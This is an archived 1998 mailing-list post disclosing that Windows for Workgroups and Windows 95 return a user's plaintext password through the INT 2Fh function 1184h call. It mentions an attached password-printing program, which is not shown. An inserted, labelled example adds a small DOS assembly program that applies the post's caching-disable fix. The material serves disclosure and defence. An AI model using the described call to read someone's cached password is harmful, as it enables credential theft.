13 tiny bytes to show the huge silliness of our great common

From: bt398 (bt398#@SOTON.AC.UK)
Date: Wed Oct 21 1998 - 15:07:44 PDT

    
            Lately, I've been playing a bit with the net.exe program
    (\windows\net.exe). With this program, a user can set up the network
    drivers (Windows For Workgroups protocol); moreover, a user can log in (open
    a WfW session) and also change his password. As this program runs on DOS,
    I've been wondering how net.exe was retrieving the password of the user;
    as no DLL calls to undocumented functions are possible, only a call to a
    special interrupt/function could be used.
    
     Then, tracing through the code, I've found a rather interesting feature.
    When a user changes his password, net.exe accesses the old password
    using the multiplex interrupt 2fh (the so-called software interrupt) with
    function 11h (sub-function 84h). I suppose that function 11XX, int 2fh is
    installed by the Windows kernel so that it can exchange data (WfW info)
    with a DOS program. Well, you would say that this function requires as
    input the password and returns an error if the password is bad.. but, no..
    Microsoft did it the other way. The function returns the unencrypted password
    to a buffer (... no comment).
    
    Indeed, this is not a _big_ deal, but if a user has access to your computer
    after you have logged in, then he can easily retrieve your password.. And I am
    sure that a lot of people use the same password for their mail and their
    Windows password (so it is somewhat of a security problem). I attached a small
    program that prints the password of the user (you must have logged in
    first); this only works on Windows for Workgroups 3.11 and Windows 95
    (Windows 98 and Windows NT are not affected -hopefully-).
    
    But I wouldn't be surprised if Win98 has an undocumented function that
    returns the password of the user (I wouldn't bet that about NT though.)
    
    Fix: well, I didn't find anything, except that this code:
    
        mov ax, 1184h
        mov bx, 0dh
        xor cx, cx
        int 2fh
    
    seems to disable the password caching feature.
    
                                                            ga
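The post's proposed fix is four bare instructions. As an added example (not the original poster's code and not the contents of the attached archive), the following NASM source wraps that call into a small DOS .COM program that can be run from AUTOEXEC.BAT or a login script to turn the cache off on every boot. It first performs the documented INT 2Fh function 11h installation check (AX=1100h, AL=FFh on return when a network redirector is present) so the call is not issued on a machine with no redirector loaded. That AX=1184h / BX=0Dh / CX=0 actually disables password caching is taken from the post above, not independently verified here; the message strings and the file name cachekill.com are the author's own choices.

```nasm
; cachekill.asm - added example, not part of the original post.
; Issues the INT 2Fh call quoted in the post to disable WfW/Win95 password
; caching, after checking that a network redirector is installed.
; Assemble with:  nasm -f bin cachekill.asm -o cachekill.com
; Run from DOS (or the AUTOEXEC.BAT / login script) before a WfW session is opened.

        org 100h                ; .COM programs load at offset 100h

start:
        mov ax, 1100h           ; INT 2Fh function 11h, sub-function 00h:
        int 2Fh                 ;   network redirector installation check
        cmp al, 0FFh            ; AL = FFh means a redirector is installed
        jne no_redir

        ; Register set-up from the post; assumed (per the post) to disable
        ; the password caching feature of the WfW redirector.
        mov ax, 1184h
        mov bx, 0Dh
        xor cx, cx
        int 2Fh

        mov dx, msg_done
        jmp print

no_redir:
        mov dx, msg_none        ; nothing to do without a redirector

print:
        mov ah, 09h             ; DOS: write '$'-terminated string at DS:DX
        int 21h
        mov ax, 4C00h           ; DOS: terminate with return code 0
        int 21h

msg_done: db 'cachekill: password caching disable call issued.', 13, 10, '$'
msg_none: db 'cachekill: no network redirector (INT 2Fh/11h) present.', 13, 10, '$'
```

Because the check and the disable call both go through the multiplex interrupt, the program has no effect (and prints the second message) on a plain DOS box where the WfW network drivers were never started; it should be run after NET START, which is where the cache would otherwise be populated.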



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:20:30 PDT